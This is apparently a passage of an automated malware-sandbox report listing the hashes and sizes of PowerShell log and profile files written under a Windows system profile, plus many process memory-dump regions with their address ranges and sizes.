                                                                            MD5

                                                                            cd6ccec4e5220cb0db04e7a825b1a6cb

                                                                            SHA1

                                                                            f377023f9be4b4b0b599bdc899f2615a1ac7ace2

                                                                            SHA256

                                                                            dc280a2ecc1048e8bb391d542b6d6b7d18a4a383436943e458ad243b6cf50bc6

                                                                            SHA512

                                                                            6a720bc07ca6a95213c61df415eeb4400840cec3abc8a1cbe2777c1a458287a8f21c4a24162f5f1b3800c48426b8800ad03162d854efaec915c7e92139316104

                                                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                            Filesize

                                                                            3KB

                                                                            MD5

                                                                            06d16fea6ab505097d16fcaa32949d47

                                                                            SHA1

                                                                            0c1c719831fa41cd102d0d72d61c0f46ec5b8de8

                                                                            SHA256

                                                                            54e15de2bef9f651d7717e2a336ac6b2ea2b723e6f29d2b153d8fbbc89aef723

                                                                            SHA512

                                                                            03c00f1eebb51cec11703141ae9d9c3ac589f5495bc04d8a4b043714089a9d50bd3a520e4d72b4a4c99f5b9bf5f689bf2585fa5c7d4ddbe6f71cbba0172f593a

                                                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            b899207441c0301bb017e3141d12fbd0

                                                                            SHA1

                                                                            4f7811f37267e498fe5cf0b492aaebb906ac5e2a

                                                                            SHA256

                                                                            73ea7a0773a42b5d698bcaded17c028c28a8a4c9be070aefc870665668a55200

                                                                            SHA512

                                                                            1ee8f058888566de059adf051dfda5d9468fa5b90219aff996e151759184cfefd0f91261fdf70aa8deb9359555e163da35402f058daf35093a6867256090abd2

                                                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            1aefd4e1f3dfe890fbcf171751fdcfb8

                                                                            SHA1

                                                                            26cf4c0aedac08f6c93802de131525225d4beafb

                                                                            SHA256

                                                                            dd500bed55924736b3a1801d703f0e3949d24207d7616f6f51a9af9e5215aa79

                                                                            SHA512

                                                                            599e07fff6e798578d074e635da379df141e676ebc4ece02de01e17fa9f98772fd7956ff79885eb9861869aa52bfb9f9f32b6de3b817dede0fc2d8d1de228ca1

                                                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            dc9c781fb91cfdd8f626df71d07fc835

                                                                            SHA1

                                                                            9eddb67b260c30a15a7ee062d6e034e17bb70566

                                                                            SHA256

                                                                            17abfa2e3523b2dc3f3385003c9b934aeea60b1ed60e12fbba7542152d8baa18

                                                                            SHA512

                                                                            2bcbbb5afc6e188a60300d6d816bd2e6800721be90201387f9303dcda3fb983ac4b696f1e6624031b17f8ac6b6f0d8d5b4e5d16c5b0d6f9373c411632b9f5366

                                                                          • memory/1256-8769-0x00000000009B0000-0x0000000000E73000-memory.dmp

                                                                            Filesize

                                                                            4.8MB

                                                                          • memory/1256-8765-0x00000000009B0000-0x0000000000E73000-memory.dmp

                                                                            Filesize

                                                                            4.8MB

                                                                          • memory/1680-2888-0x0000027052550000-0x0000027052572000-memory.dmp

                                                                            Filesize

                                                                            136KB

                                                                          • memory/1976-12095-0x0000000000270000-0x00000000006F0000-memory.dmp

                                                                            Filesize

                                                                            4.5MB

                                                                          • memory/1976-12085-0x0000000000270000-0x00000000006F0000-memory.dmp

                                                                            Filesize

                                                                            4.5MB

                                                                          • memory/2408-12840-0x0000000000400000-0x00000000008BD000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/2408-13731-0x0000000000400000-0x00000000008BD000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/2476-20-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/2476-18-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/2476-41-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/2476-22-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/2476-21-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/2476-59-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/2476-19-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/2504-9228-0x0000000000DC0000-0x0000000001214000-memory.dmp

                                                                            Filesize

                                                                            4.3MB

                                                                          • memory/2504-12088-0x0000000000DC0000-0x0000000001214000-memory.dmp

                                                                            Filesize

                                                                            4.3MB

                                                                          • memory/2504-9226-0x0000000000DC0000-0x0000000001214000-memory.dmp

                                                                            Filesize

                                                                            4.3MB

                                                                          • memory/2504-11920-0x0000000000DC0000-0x0000000001214000-memory.dmp

                                                                            Filesize

                                                                            4.3MB

                                                                          • memory/2504-9227-0x0000000000DC0000-0x0000000001214000-memory.dmp

                                                                            Filesize

                                                                            4.3MB

                                                                          • memory/2700-8790-0x00007FF641F90000-0x00007FF642618000-memory.dmp

                                                                            Filesize

                                                                            6.5MB

                                                                          • memory/2700-8792-0x00007FF641F90000-0x00007FF642618000-memory.dmp

                                                                            Filesize

                                                                            6.5MB

                                                                          • memory/3116-4200-0x00000244F9990000-0x00000244F99D4000-memory.dmp

                                                                            Filesize

                                                                            272KB

                                                                          • memory/3116-4248-0x00000244F9A60000-0x00000244F9AD6000-memory.dmp

                                                                            Filesize

                                                                            472KB

                                                                          • memory/3168-13153-0x00000280F86F0000-0x00000280F87A5000-memory.dmp

                                                                            Filesize

                                                                            724KB

                                                                          • memory/3376-5660-0x0000000000400000-0x0000000000CDA000-memory.dmp

                                                                            Filesize

                                                                            8.9MB

                                                                          • memory/3376-5909-0x0000000000400000-0x0000000000CDA000-memory.dmp

                                                                            Filesize

                                                                            8.9MB

                                                                          • memory/4612-2903-0x0000000005530000-0x0000000005B58000-memory.dmp

                                                                            Filesize

                                                                            6.2MB

                                                                          • memory/4612-2921-0x00000000063C0000-0x000000000640C000-memory.dmp

                                                                            Filesize

                                                                            304KB

                                                                          • memory/4612-2920-0x0000000006380000-0x000000000639E000-memory.dmp

                                                                            Filesize

                                                                            120KB

                                                                          • memory/4612-2922-0x0000000007550000-0x00000000075E6000-memory.dmp

                                                                            Filesize

                                                                            600KB

                                                                          • memory/4612-2902-0x0000000002DE0000-0x0000000002E16000-memory.dmp

                                                                            Filesize

                                                                            216KB

                                                                          • memory/4612-2923-0x0000000006870000-0x000000000688A000-memory.dmp

                                                                            Filesize

                                                                            104KB

                                                                          • memory/4612-2906-0x00000000054E0000-0x0000000005502000-memory.dmp

                                                                            Filesize

                                                                            136KB

                                                                          • memory/4612-2925-0x0000000007BA0000-0x0000000008144000-memory.dmp

                                                                            Filesize

                                                                            5.6MB

                                                                          • memory/4612-2924-0x00000000068C0000-0x00000000068E2000-memory.dmp

                                                                            Filesize

                                                                            136KB

                                                                          • memory/4612-2907-0x0000000005BD0000-0x0000000005C36000-memory.dmp

                                                                            Filesize

                                                                            408KB

                                                                          • memory/4612-2908-0x0000000005D70000-0x0000000005DD6000-memory.dmp

                                                                            Filesize

                                                                            408KB

                                                                          • memory/4612-2918-0x0000000005FA0000-0x00000000062F4000-memory.dmp

                                                                            Filesize

                                                                            3.3MB

                                                                          • memory/4788-120-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-116-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-90-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-92-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-94-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-96-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-98-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-100-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-102-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-104-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-106-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-110-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-112-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-114-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-132-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-108-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-87-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-140-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-123-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-124-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-85-0x000002548A300000-0x000002548A3A8000-memory.dmp

                                                                            Filesize

                                                                            672KB

                                                                          • memory/4788-2879-0x00000254A4930000-0x00000254A4986000-memory.dmp

                                                                            Filesize

                                                                            344KB

                                                                          • memory/4788-86-0x00000254A4790000-0x00000254A489C000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-126-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-2880-0x00000254A4990000-0x00000254A49DC000-memory.dmp

                                                                            Filesize

                                                                            304KB

                                                                          • memory/4788-2882-0x00000254A4AE0000-0x00000254A4B34000-memory.dmp

                                                                            Filesize

                                                                            336KB

                                                                          • memory/4788-118-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-128-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-130-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-134-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-89-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-136-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-142-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/4788-138-0x00000254A4790000-0x00000254A4898000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                          • memory/5192-12440-0x0000000005D50000-0x00000000060A4000-memory.dmp

                                                                            Filesize

                                                                            3.3MB

                                                                          • memory/5192-12445-0x0000000006760000-0x00000000067AC000-memory.dmp

                                                                            Filesize

                                                                            304KB

                                                                          • memory/5204-5016-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/5204-5048-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/5240-38-0x0000000000400000-0x000000000078C000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/5240-39-0x0000000000400000-0x000000000078C000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/5240-37-0x0000000000400000-0x000000000078C000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/5240-61-0x0000000000400000-0x000000000078C000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/5240-64-0x0000000000400000-0x000000000078C000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/5240-42-0x0000000000400000-0x000000000078C000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/5240-40-0x0000000000400000-0x000000000078C000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/5276-5418-0x000002036DDE0000-0x000002036DDEA000-memory.dmp

                                                                            Filesize

                                                                            40KB

                                                                          • memory/5276-5447-0x000002036DFB0000-0x000002036DFBA000-memory.dmp

                                                                            Filesize

                                                                            40KB

                                                                          • memory/5276-5438-0x000002036DE10000-0x000002036DE18000-memory.dmp

                                                                            Filesize

                                                                            32KB

                                                                          • memory/5276-5443-0x000002036DE20000-0x000002036DE26000-memory.dmp

                                                                            Filesize

                                                                            24KB

                                                                          • memory/5276-5433-0x000002036DF90000-0x000002036DFAA000-memory.dmp

                                                                            Filesize

                                                                            104KB

                                                                          • memory/5276-5295-0x000002036DE30000-0x000002036DE4C000-memory.dmp

                                                                            Filesize

                                                                            112KB

                                                                          • memory/5276-5172-0x000002036DDD0000-0x000002036DDDA000-memory.dmp

                                                                            Filesize

                                                                            40KB

                                                                          • memory/5276-5169-0x000002036DED0000-0x000002036DF85000-memory.dmp

                                                                            Filesize

                                                                            724KB

                                                                          • memory/5276-5165-0x000002036DDF0000-0x000002036DE0C000-memory.dmp

                                                                            Filesize

                                                                            112KB

                                                                          • memory/5320-12069-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/5320-11418-0x00000000002D0000-0x0000000000784000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/5672-0-0x0000000000700000-0x0000000000BB4000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/5672-17-0x0000000000700000-0x0000000000BB4000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/5672-5-0x0000000000700000-0x0000000000BB4000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/5672-3-0x0000000000700000-0x0000000000BB4000-memory.dmp

                                                                            Filesize

                                                                            4.7MB

                                                                          • memory/5672-2-0x0000000000701000-0x000000000072F000-memory.dmp

                                                                            Filesize

                                                                            184KB

                                                                          • memory/5672-1-0x0000000077C44000-0x0000000077C46000-memory.dmp

                                                                            Filesize

                                                                            8KB